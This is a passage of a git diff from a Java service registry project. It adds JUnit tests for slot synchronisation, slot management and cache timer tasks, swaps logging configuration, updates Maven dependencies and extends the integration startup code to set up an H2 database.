p1Update.setVersion(p1Update.getVersion() + 1); + Map> update = Maps.newHashMap(); + update.put(p1Update.getDataInfoId(), Collections.singletonList(p1Update)); + update.put(p4.get(0).getDataInfoId(), p4); + Map> remove = Maps.newHashMap(); + remove.put(p2.get(0).getDataInfoId(), Collections.singletonList(p2.get(0).getRegisterId())); + + // sync publisher, + GenericResponse publisherResp = newPublishResp(false, update, remove); + exchanger = + mockExchange( + SessionNodeExchanger.class, + digestResp, + DataSlotDiffDigestRequest.class, + publisherResp, + DataSlotDiffPublisherRequest.class); + boolean v = syncer.syncSession(10, ServerEnv.IP, exchanger, 10, TRUE); + Assert.assertTrue(v); + + // p1 update + Datum datum1 = storage.get(p1Update.getDataInfoId()); + Assert.assertEquals(datum1.publisherSize(), 3); + Assert.assertEquals(datum1.getPubMap().get(p1Update.getRegisterId()), p1Update); + Assert.assertEquals(datum1.getPubMap().get(p1.get(1).getRegisterId()), p1.get(1)); + Assert.assertEquals(datum1.getPubMap().get(p1.get(2).getRegisterId()), p1.get(2)); + + // p2 remains 1 + Datum datum2 = storage.get(p2.get(0).getDataInfoId()); + Assert.assertEquals(datum2.publisherSize(), 1); + Assert.assertEquals(datum2.getPubMap().get(p2.get(1).getRegisterId()), p2.get(1)); + + // p3 remove all + Datum datum3 = storage.get(p3.get(0).getDataInfoId()); + Assert.assertEquals(datum3.publisherSize(), 0); + + // p4 add all + Datum datum4 = storage.get(p4.get(0).getDataInfoId()); + Assert.assertEquals(datum4.publisherSize(), 2); + Assert.assertEquals(datum4.getPubMap().get(p4.get(0).getRegisterId()), p4.get(0)); + Assert.assertEquals(datum4.getPubMap().get(p4.get(1).getRegisterId()), p4.get(1)); + } + + @Test + public void testSyncBreak() { + MockSync mockSync = mockSync(10, "testDc"); + SlotDiffSyncer syncer = mockSync.syncer; + LocalDatumStorage storage = (LocalDatumStorage) syncer.getDatumStorage(); + List p1 = mockSync.p1; + List p2 = mockSync.p2; + List p3 = mockSync.p3; + List p4 = mockSync.p4; + + // update p1.0, remove p2.0, remove p3.all, add p4 + GenericResponse digestResp = + newDigestResp( + Lists.newArrayList(p1.get(0).getDataInfoId(), p2.get(0).getDataInfoId()), + Collections.singletonList(p4.get(0).getDataInfoId()), + Collections.singletonList(p3.get(0).getDataInfoId())); + + Publisher p1Update = TestBaseUtils.cloneBase(p1.get(0)); + p1Update.setVersion(p1Update.getVersion() + 1); + Map> update = Maps.newHashMap(); + update.put(p1Update.getDataInfoId(), Collections.singletonList(p1Update)); + update.put(p4.get(0).getDataInfoId(), p4); + Map> remove = Maps.newHashMap(); + remove.put(p2.get(0).getDataInfoId(), Collections.singletonList(p2.get(0).getRegisterId())); + + // sync publisher, + GenericResponse publisherResp = newPublishResp(false, update, remove); + SessionNodeExchanger exchanger = + mockExchange( + SessionNodeExchanger.class, + digestResp, + DataSlotDiffDigestRequest.class, + publisherResp, + DataSlotDiffPublisherRequest.class); + boolean v = syncer.syncSession(10, ServerEnv.IP, exchanger, 10, FALSE); + Assert.assertTrue(v); + + // sync break, only remove dataInfoIds + Datum datum1 = storage.get(p1Update.getDataInfoId()); + Assert.assertEquals(datum1.publisherSize(), 3); + Assert.assertEquals(datum1.getPubMap().get(p1.get(0).getRegisterId()), p1.get(0)); + Assert.assertEquals(datum1.getPubMap().get(p1.get(1).getRegisterId()), p1.get(1)); + Assert.assertEquals(datum1.getPubMap().get(p1.get(2).getRegisterId()), p1.get(2)); + + // p2 remains 2 + Datum datum2 = storage.get(p2.get(0).getDataInfoId()); + Assert.assertEquals(datum2.publisherSize(), 2); + Assert.assertEquals(datum2.getPubMap().get(p2.get(0).getRegisterId()), p2.get(0)); + Assert.assertEquals(datum2.getPubMap().get(p2.get(1).getRegisterId()), p2.get(1)); + + // p3 remove all + Datum datum3 = storage.get(p3.get(0).getDataInfoId()); + Assert.assertEquals(datum3.publisherSize(), 0); + + // p4 is empty + Datum datum4 = storage.get(p4.get(0).getDataInfoId()); + Assert.assertEquals(datum4.publisherSize(), 0); + } + + @Test + public void testSyncLeader() { + MockSync mockSync = mockSync(10, "testDc"); + SlotDiffSyncer syncer = mockSync.syncer; + LocalDatumStorage storage = (LocalDatumStorage) syncer.getDatumStorage(); + List p1 = mockSync.p1; + List p2 = mockSync.p2; + List p3 = mockSync.p3; + List p4 = mockSync.p4; + + // sync failed or empty + DataNodeExchanger exchanger = + mockExchange(DataNodeExchanger.class, null, DataSlotDiffDigestRequest.class, null, null); + Assert.assertFalse(syncer.syncSlotLeader(10, ServerEnv.IP, exchanger, 10, TRUE)); + + exchanger = + mockExchange( + DataNodeExchanger.class, failDigestResp(), DataSlotDiffDigestRequest.class, null, null); + Assert.assertFalse(syncer.syncSlotLeader(10, ServerEnv.IP, exchanger, 10, TRUE)); + + exchanger = + mockExchange( + DataNodeExchanger.class, + emptyDigestResp(), + DataSlotDiffDigestRequest.class, + null, + null); + Assert.assertTrue(syncer.syncSlotLeader(10, ServerEnv.IP, exchanger, 10, TRUE)); + + // sync success + // update p1.0, remove p2.0, remove p3.all, add p4 + GenericResponse digestResp = + newDigestResp( + Lists.newArrayList(p1.get(0).getDataInfoId(), p2.get(0).getDataInfoId()), + Collections.singletonList(p4.get(0).getDataInfoId()), + Collections.singletonList(p3.get(0).getDataInfoId())); + + Publisher p1Update = TestBaseUtils.cloneBase(p1.get(0)); + p1Update.setVersion(p1Update.getVersion() + 1); + Map> update = Maps.newHashMap(); + update.put(p1Update.getDataInfoId(), Collections.singletonList(p1Update)); + update.put(p4.get(0).getDataInfoId(), p4); + Map> remove = Maps.newHashMap(); + remove.put(p2.get(0).getDataInfoId(), Collections.singletonList(p2.get(0).getRegisterId())); + + // sync publisher, + GenericResponse publisherResp = newPublishResp(false, update, remove); + exchanger = + mockExchange( + DataNodeExchanger.class, + digestResp, + DataSlotDiffDigestRequest.class, + publisherResp, + DataSlotDiffPublisherRequest.class); + boolean v = syncer.syncSlotLeader(10, ServerEnv.IP, exchanger, 10, TRUE); + Assert.assertTrue(v); + + // p1 update + Datum datum1 = storage.get(p1Update.getDataInfoId()); + Assert.assertEquals(datum1.publisherSize(), 3); + Assert.assertEquals(datum1.getPubMap().get(p1Update.getRegisterId()), p1Update); + Assert.assertEquals(datum1.getPubMap().get(p1.get(1).getRegisterId()), p1.get(1)); + Assert.assertEquals(datum1.getPubMap().get(p1.get(2).getRegisterId()), p1.get(2)); + + // p2 remains 1 + Datum datum2 = storage.get(p2.get(0).getDataInfoId()); + Assert.assertEquals(datum2.publisherSize(), 1); + Assert.assertEquals(datum2.getPubMap().get(p2.get(1).getRegisterId()), p2.get(1)); + + // p3 remove all + Datum datum3 = storage.get(p3.get(0).getDataInfoId()); + Assert.assertEquals(datum3.publisherSize(), 0); + + // p4 add all + Datum datum4 = storage.get(p4.get(0).getDataInfoId()); + Assert.assertEquals(datum4.publisherSize(), 2); + Assert.assertEquals(datum4.getPubMap().get(p4.get(0).getRegisterId()), p4.get(0)); + Assert.assertEquals(datum4.getPubMap().get(p4.get(1).getRegisterId()), p4.get(1)); + } + + private static T mockExchange( + Class c, Object result1, Class reqClazz1, Object result2, Class reqClazz2) { + T exchanger = mock(c); + when(exchanger.requestRaw(anyString(), Matchers.isA(reqClazz1))) + .thenReturn( + new Response() { + @Override + public Object getResult() { + return result1; + } + }); + if (reqClazz2 != null) { + when(exchanger.requestRaw(anyString(), Matchers.isA(reqClazz2))) + .thenReturn( + new Response() { + @Override + public Object getResult() { + return result2; + } + }); + } + return exchanger; + } + + static SlotDiffSyncer newSyncer() { + return newSyncer(true); + } + + static SlotDiffSyncer newSyncer(boolean init) { + LocalDatumStorage storage = TestBaseUtils.newLocalStorage("testDc", init); + DataChangeEventCenter eventCenter = new DataChangeEventCenter(); + SessionLeaseManager sessionLeaseManager = new SessionLeaseManager(); + SlotDiffSyncer syncer = + new SlotDiffSyncer( + storage.getDataServerConfig(), storage, eventCenter, sessionLeaseManager); + return syncer; + } + + private static GenericResponse failPublisherResp() { + GenericResponse resp = new GenericResponse<>(); + resp.fillFailed("fail"); + return resp; + } + + private static GenericResponse emptyPublisherResp() { + GenericResponse resp = new GenericResponse<>(); + DataSlotDiffPublisherResult empty = + new DataSlotDiffPublisherResult(false, Collections.emptyMap(), Collections.emptyMap()); + empty.setSessionProcessId(ServerEnv.PROCESS_ID); + resp.fillSucceed(empty); + return resp; + } + + private static GenericResponse newPublishResp( + boolean hasRemain, + Map> updatedPublishers, + Map> removedPublishers) { + GenericResponse resp = new GenericResponse<>(); + DataSlotDiffPublisherResult result = + new DataSlotDiffPublisherResult(hasRemain, updatedPublishers, removedPublishers); + result.setSessionProcessId(ServerEnv.PROCESS_ID); + resp.fillSucceed(result); + return resp; + } + + private static GenericResponse failDigestResp() { + GenericResponse resp = new GenericResponse<>(); + resp.fillFailed("fail"); + return resp; + } + + private static GenericResponse emptyDigestResp() { + GenericResponse resp = new GenericResponse<>(); + DataSlotDiffDigestResult empty = + new DataSlotDiffDigestResult( + Collections.EMPTY_LIST, Collections.EMPTY_LIST, Collections.EMPTY_LIST); + empty.setSessionProcessId(ServerEnv.PROCESS_ID); + resp.fillSucceed(empty); + return resp; + } + + private static GenericResponse newDigestResp( + List updatedDataInfoIds, + List addedDataInfoIds, + List removedDataInfoIds) { + GenericResponse resp = new GenericResponse<>(); + DataSlotDiffDigestResult result = + new DataSlotDiffDigestResult(updatedDataInfoIds, addedDataInfoIds, removedDataInfoIds); + result.setSessionProcessId(ServerEnv.PROCESS_ID); + resp.fillSucceed(result); + return resp; + } + + static final class MockSync { + SlotDiffSyncer syncer; + List p1; + List p2; + List p3; + List p4; + } + + static MockSync mockSync(int slotId, String dc, boolean init) { + SlotDiffSyncer syncer = newSyncer(init); + MockSync ms = new MockSync(); + if (init) { + LocalDatumStorage storage = (LocalDatumStorage) syncer.getDatumStorage(); + List p1 = TestBaseUtils.createTestPublishers(slotId, 3); + List p2 = TestBaseUtils.createTestPublishers(slotId, 2); + List p3 = TestBaseUtils.createTestPublishers(slotId, 2); + List p4 = TestBaseUtils.createTestPublishers(slotId, 2); + storage.put(p1.get(0).getDataInfoId(), p1); + storage.put(p2.get(0).getDataInfoId(), p2); + storage.put(p3.get(0).getDataInfoId(), p3); + // empty d4 + storage.createEmptyDatumIfAbsent(p4.get(0).getDataInfoId(), dc); + ms.p1 = p1; + ms.p2 = p2; + ms.p3 = p3; + ms.p4 = p4; + } + ms.syncer = syncer; + return ms; + } + + static MockSync mockSync(int slotId, String dc) { + return mockSync(slotId, dc, true); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/slot/SlotManagerImplTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/slot/SlotManagerImplTest.java new file mode 100644 index 000000000..f297d6fe4 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/slot/SlotManagerImplTest.java @@ -0,0 +1,260 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.slot; + +import com.alipay.sofa.registry.common.model.slot.*; +import com.alipay.sofa.registry.server.data.cache.LocalDatumStorage; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerServiceImpl; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.slot.DiskSlotTableRecorder; +import com.alipay.sofa.registry.task.KeyedTask; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.*; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class SlotManagerImplTest { + + @Test + public void testUpdate() { + SlotManagerImpl sm = mockSM(10, false, false, Collections.EMPTY_SET).slotManager; + SlotTable slotTable = new SlotTable(1, Collections.emptyList()); + Assert.assertTrue(sm.updateSlotTable(slotTable)); + Assert.assertFalse(sm.updateSlotTable(slotTable)); + + slotTable = newTable_0_1(2, 2); + Assert.assertTrue(sm.updateSlotTable(slotTable)); + + try { + sm.updateSlotTable(newTable_0_1(3, 1)); + Assert.assertTrue(false); + } catch (RuntimeException e) { + Assert.assertTrue(e.getMessage().contains("not expect Slot.LeaderEpoch")); + } + slotTable = newTable_0_1(3, 3); + Assert.assertTrue(sm.updateSlotTable(slotTable)); + + sm.processUpdating(); + Assert.assertEquals(sm.getSlotTableEpoch(), slotTable.getEpoch()); + slotEquals(slotTable, sm); + } + + @Test + public void testSlots() { + Mock mock = mockSM(10, false, false, Collections.EMPTY_SET); + SlotManagerImpl sm = mock.slotManager; + SlotTable slotTable = newTable_0_1(3, 3); + Assert.assertTrue(sm.updateSlotTable(slotTable)); + sm.processUpdating(); + LocalDatumStorage storage = (LocalDatumStorage) mock.mockSync.syncer.getDatumStorage(); + // check slots, 2 slots [0,1] + Assert.assertTrue(storage.updateVersion(0)); + Assert.assertTrue(storage.updateVersion(1)); + Assert.assertFalse(storage.updateVersion(2)); + + Assert.assertTrue(sm.isLeader(0)); + Assert.assertTrue(sm.isFollower(1)); + + Assert.assertFalse(sm.isFollower(0)); + Assert.assertFalse(sm.isLeader(1)); + + slotTable = newTable_1_2(4, 4); + Assert.assertTrue(sm.updateSlotTable(slotTable)); + sm.processUpdating(); + // check slots, 2 slots [1,2] + Assert.assertFalse(storage.updateVersion(0)); + Assert.assertTrue(storage.updateVersion(1)); + Assert.assertTrue(storage.updateVersion(2)); + Assert.assertFalse(storage.updateVersion(3)); + + Assert.assertTrue(sm.isLeader(1)); + Assert.assertTrue(sm.isFollower(2)); + + Assert.assertFalse(sm.isFollower(1)); + Assert.assertFalse(sm.isLeader(2)); + } + + @Test + public void testCheckAccess() { + Mock mock = mockSM(10, false, false, Collections.EMPTY_SET); + SlotManagerImpl sm = mock.slotManager; + SlotTable slotTable = newTable_0_1(3, 3); + sm.updateSlotTable(slotTable); + sm.processUpdating(); + + SlotAccess access0 = sm.checkSlotAccess(0, 100, slotTable.getSlot(0).getLeaderEpoch()); + Assert.assertTrue(access0.isMigrating()); + SlotAccess access1 = sm.checkSlotAccess(1, 100, slotTable.getSlot(1).getLeaderEpoch()); + Assert.assertTrue(access1.isMoved()); + } + + @Test + public void testCheckAccessFull() { + Mock mock = mockSM(10, false, false, Collections.EMPTY_SET); + SlotManagerImpl sm = mock.slotManager; + SlotAccess access = sm.checkSlotAccess(0, 100, null, 100); + Assert.assertTrue(access.isMoved()); + SlotManagerImpl.SlotState slotState = new SlotManagerImpl.SlotState(createFollower(0, 100)); + access = sm.checkSlotAccess(0, 100, slotState, 100); + Assert.assertTrue(access.isMoved()); + + slotState = new SlotManagerImpl.SlotState(createLeader(0, 100)); + access = sm.checkSlotAccess(0, 100, slotState, 100); + Assert.assertTrue(access.isMigrating()); + + slotState = new SlotManagerImpl.SlotState(createLeader(0, 100)); + slotState.migrated = true; + access = sm.checkSlotAccess(0, 100, slotState, 101); + Assert.assertTrue(access.isMisMatch()); + + slotState = new SlotManagerImpl.SlotState(createLeader(0, 100)); + slotState.migrated = true; + access = sm.checkSlotAccess(0, 100, slotState, 100); + Assert.assertTrue(access.isAccept()); + } + + @Test + public void testSync() throws Exception { + Mock mock = mockSM(10, true, true, Sets.newHashSet("xx1", "xx2")); + SlotManagerImpl sm = mock.slotManager; + Assert.assertEquals(sm.slotOf(mock.mockSync.p1.get(0).getDataInfoId()), 10); + SlotTable slotTable = newTable_0_1(3, 3); + sm.updateSlotTable(slotTable); + sm.processUpdating(); + SlotManagerImpl.SlotState slotState = new SlotManagerImpl.SlotState(createLeader(0, 3)); + slotState.migrated = false; + // migrating + KeyedTask kt = Mockito.mock(KeyedTask.class); + slotState.syncLeaderTask = kt; + + Mockito.when(kt.isFinished()).thenReturn(false); + boolean sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertFalse(sync); + + Mockito.when(kt.isFinished()).thenReturn(true); + sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertTrue(sync); + Assert.assertFalse(slotState.migrated); + Assert.assertEquals(slotState.migratingTasks.size(), 2); + Mockito.when(kt.isSuccess()).thenReturn(true); + Thread.sleep(3000); + for (SlotManagerImpl.MigratingTask mt : slotState.migratingTasks.values()) { + Assert.assertTrue(mt.task.isFailed()); + // mock the migrate task success + mt.task = kt; + } + Assert.assertEquals(slotState.syncSessionTasks.size(), 0); + + sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertTrue(sync); + Assert.assertTrue(slotState.migrated); + + sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertTrue(sync); + Thread.sleep(2000); + + sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertTrue(sync); + + // test sync leader + slotState = new SlotManagerImpl.SlotState(createFollower(1, 3)); + slotState.syncLeaderTask = kt; + sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertTrue(sync); + Mockito.when(kt.isOverAfter(Mockito.anyInt())).thenReturn(true); + sync = sm.sync(slotState, 1000, 1000, 100); + Assert.assertTrue(sync); + Assert.assertTrue(slotState.syncLeaderTask != kt); + Thread.sleep(2000); + Assert.assertTrue(slotState.syncLeaderTask.isFailed()); + + sm.syncWatch(); + Thread.sleep(1000); + List list = sm.getSlotStatuses(); + Assert.assertTrue(list.size() == 2); + + LeaderSlotStatus leaderStatus = (LeaderSlotStatus) list.get(0); + Assert.assertEquals(leaderStatus.getLeaderStatus(), BaseSlotStatus.LeaderStatus.UNHEALTHY); + + FollowerSlotStatus followerstatus = (FollowerSlotStatus) list.get(1); + Assert.assertTrue(followerstatus.getLastSyncTaskStartTime() > 0); + Assert.assertTrue(followerstatus.getLastLeaderSyncTime() <= 0); + } + + static void slotEquals(SlotTable table, SlotManagerImpl sm) { + Map slotMap = table.getSlotMap(); + for (Slot slot : slotMap.values()) { + Slot s = sm.getSlot(slot.getId()); + Assert.assertEquals(s, slot); + } + Assert.assertEquals(sm.getSlotStatuses().size(), slotMap.size()); + } + + static Slot createLeader(int slotId, long leaderEpoch) { + return new Slot(slotId, ServerEnv.IP, leaderEpoch, Lists.newArrayList("xxx")); + } + + static Slot createFollower(int slotId, long leaderEpoch) { + return new Slot(slotId, "xxx", leaderEpoch, Lists.newArrayList(ServerEnv.IP, "yyy")); + } + + static SlotTable newTable_0_1(int tableEpoch, int leaderEpoch) { + Slot slot0 = createLeader(0, leaderEpoch); + Slot slot1 = createFollower(1, leaderEpoch); + SlotTable slotTable = new SlotTable(tableEpoch, Lists.newArrayList(slot0, slot1)); + return slotTable; + } + + static SlotTable newTable_1_2(int tableEpoch, int leaderEpoch) { + Slot slot1 = createLeader(1, leaderEpoch); + Slot slot2 = createFollower(2, leaderEpoch); + SlotTable slotTable = new SlotTable(tableEpoch, Lists.newArrayList(slot1, slot2)); + return slotTable; + } + + static Mock mockSM(int slotId, boolean initSync, boolean initExecutor, Set sessions) { + SlotDiffSyncerTest.MockSync mockSync = SlotDiffSyncerTest.mockSync(slotId, "testDc", initSync); + SlotDiffSyncer syncer = mockSync.syncer; + SlotManagerImpl slotManager = new SlotManagerImpl(); + slotManager.setDataChangeEventCenter(new DataChangeEventCenter()); + slotManager.setSessionLeaseManager(new SessionLeaseManager()); + slotManager.setLocalDatumStorage(syncer.getDatumStorage()); + slotManager.setDataServerConfig(syncer.getDataServerConfig()); + MetaServerServiceImpl mss = Mockito.mock(MetaServerServiceImpl.class); + slotManager.setRecorders(Lists.newArrayList(new DiskSlotTableRecorder(), mss)); + Mockito.when(mss.getSessionServerList()).thenReturn(sessions); + slotManager.setMetaServerService(mss); + slotManager.initSlotChangeListener(); + if (initExecutor) { + slotManager.initExecutors(); + } + + Mock mock = new Mock(); + mock.mockSync = mockSync; + mock.slotManager = slotManager; + return mock; + } + + static final class Mock { + SlotDiffSyncerTest.MockSync mockSync; + SlotManagerImpl slotManager; + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/timer/CacheCountTaskTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/timer/CacheCountTaskTest.java new file mode 100644 index 000000000..a346b44b3 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/timer/CacheCountTaskTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.timer; + +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import org.junit.Assert; +import org.junit.Test; + +public class CacheCountTaskTest { + + @Test + public void test() throws Exception { + CacheCountTask task = new CacheCountTask(); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + task.setDataServerConfig(cfg); + + // npe + Assert.assertFalse(task.count()); + + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + task.setDatumCache(datumCache); + + cfg.setCacheCountIntervalSecs(0); + Assert.assertFalse(task.init()); + // empty + Assert.assertTrue(task.count()); + + cfg.setCacheCountIntervalSecs(1); + Publisher pub = TestBaseUtils.createTestPublisher("testDataId"); + datumCache.getLocalDatumStorage().put(pub); + // has item + Assert.assertTrue(task.count()); + Assert.assertTrue(task.init()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/timer/CacheDigestTaskTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/timer/CacheDigestTaskTest.java new file mode 100644 index 000000000..0de27a2cf --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/timer/CacheDigestTaskTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.timer; + +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import org.junit.Assert; +import org.junit.Test; + +public class CacheDigestTaskTest { + @Test + public void test() throws Exception { + CacheDigestTask task = new CacheDigestTask(); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + task.setDataServerConfig(cfg); + + // npe error + Assert.assertFalse(task.dump()); + + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + task.setDatumCache(datumCache); + + cfg.setCacheDigestIntervalMinutes(0); + Assert.assertFalse(task.init()); + + // empty + Assert.assertTrue(task.dump()); + + cfg.setCacheDigestIntervalMinutes(1); + Publisher pub = TestBaseUtils.createTestPublisher("testDataId"); + datumCache.getLocalDatumStorage().put(pub); + // has item + Assert.assertTrue(task.dump()); + Assert.assertTrue(task.init()); + } +} diff --git a/server/server/data/src/test/resources/log4j2.xml b/server/server/data/src/test/resources/log4j2.xml new file mode 100644 index 000000000..708fabcec --- /dev/null +++ b/server/server/data/src/test/resources/log4j2.xml @@ -0,0 +1,54 @@ + + + + + + ${user.home}/logs/registry/data + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/server/data/src/test/resources/logback-test.xml b/server/server/data/src/test/resources/logback-test.xml deleted file mode 100644 index 349319ca3..000000000 --- a/server/server/data/src/test/resources/logback-test.xml +++ /dev/null @@ -1,75 +0,0 @@ - - - - - - - - - - true - - INFO - - - ERROR - DENY - - ${LOG_HOME}/registry-data.log - - ${LOG_HOME}/registry-data.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - UTF-8 - - - - - true - - ERROR - - ${LOG_HOME}/common-error.log - - ${LOG_HOME}/common-error.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}#%L] - %m%n - UTF-8 - - - - - - - - - - - - - \ No newline at end of file diff --git a/server/server/integration/pom.xml b/server/server/integration/pom.xml index d5cd0191d..208293bcd 100644 --- a/server/server/integration/pom.xml +++ b/server/server/integration/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -34,8 +34,33 @@ commons-io - org.springframework.boot - spring-boot-starter + com.alipay.sofa + registry-common-util + + + com.alipay.sofa + registry-server-data + + + com.alipay.sofa + registry-server-data + + + com.alipay.sofa + registry-server-session + + + com.alipay.sofa + registry-server-data + + + com.alipay.sofa + registry-server-meta + + + com.h2database + h2 + 1.4.200 @@ -63,4 +88,4 @@ - \ No newline at end of file + diff --git a/server/server/integration/src/main/java/com/alipay/sofa/registry/server/integration/RegistryApplication.java b/server/server/integration/src/main/java/com/alipay/sofa/registry/server/integration/RegistryApplication.java index 7f9f9dd64..7d7871e6a 100644 --- a/server/server/integration/src/main/java/com/alipay/sofa/registry/server/integration/RegistryApplication.java +++ b/server/server/integration/src/main/java/com/alipay/sofa/registry/server/integration/RegistryApplication.java @@ -16,6 +16,8 @@ */ package com.alipay.sofa.registry.server.integration; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; + import com.alipay.sofa.registry.common.model.CommonResponse; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; @@ -28,125 +30,278 @@ import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerBootstrap; import com.alipay.sofa.registry.server.session.SessionApplication; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerBootstrap; +import com.alipay.sofa.registry.util.FileUtils; import com.alipay.sofa.registry.util.PropertySplitter; +import java.io.*; +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.util.Collection; +import org.apache.commons.io.IOUtils; +import org.apache.commons.lang.StringUtils; +import org.apache.logging.log4j.util.Strings; +import org.h2.tools.Server; import org.springframework.boot.builder.SpringApplicationBuilder; import org.springframework.context.ConfigurableApplicationContext; -import java.util.Collection; - -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; - /** * @author xuanbei * @since 2019/2/15 */ public class RegistryApplication { - private static final Logger LOGGER = LoggerFactory - .getLogger(RegistryApplication.class); - private static final String META_HTTP_SERVER_PORT = "meta.server.httpServerPort"; - private static final String DATA_HTTP_SERVER_PORT = "data.server.httpServerPort"; - private static final String SESSION_HTTP_SERVER_PORT = "session.server.httpServerPort"; - private static final String META_NODES = "nodes.metaNode"; - private static final String NODES_LOCAL_DATA_CENTER = "nodes.localDataCenter"; - - private static ConfigurableApplicationContext metaApplicationContext; - private static ConfigurableApplicationContext sessionApplicationContext; - private static ConfigurableApplicationContext dataApplicationContext; - - public static void main(String[] args) throws Exception { - // setup DefaultUncaughtExceptionHandler - Thread.setDefaultUncaughtExceptionHandler((t, e) -> { - LOGGER.error(String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); + private static final Logger LOGGER = LoggerFactory.getLogger(RegistryApplication.class); + private static final String META_HTTP_SERVER_PORT = "meta.server.httpServerPort"; + private static final String DATA_HTTP_SERVER_PORT = "data.server.httpServerPort"; + private static final String SESSION_HTTP_SERVER_PORT = "session.server.httpServerPort"; + private static final String META_NODES = "nodes.metaNode"; + private static final String NODES_LOCAL_DATA_CENTER = "nodes.localDataCenter"; + + private static ConfigurableApplicationContext metaApplicationContext; + private static ConfigurableApplicationContext sessionApplicationContext; + private static ConfigurableApplicationContext dataApplicationContext; + + public static void main(String[] args) throws Exception { + System.setProperty("spring.profiles.active", "integrate"); + System.setProperty("registry.lease.duration.secs", "10"); + System.setProperty("registry.elector.warm.up.millis", "2000"); + // setup DefaultUncaughtExceptionHandler + Thread.setDefaultUncaughtExceptionHandler( + (t, e) -> { + LOGGER.error( + String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); }); - // start registry application - ConfigurableApplicationContext commonContext = - new SpringApplicationBuilder(RegistryApplication.class).run(args); + // start registry application + ConfigurableApplicationContext commonContext = + new SpringApplicationBuilder(RegistryApplication.class).run(args); - // get all server address list - Collection serverList = getServerList(commonContext); + // get all server address list + Collection serverList = getServerList(commonContext); - // start meta - metaApplicationContext = new SpringApplicationBuilder(MetaApplication.class).parent(commonContext).run(); + String driver = commonContext.getEnvironment().getProperty("jdbc.driverClassName"); + if ("org.h2.Driver".equals(driver)) { + createTables(commonContext); + Server.createWebServer("-web", 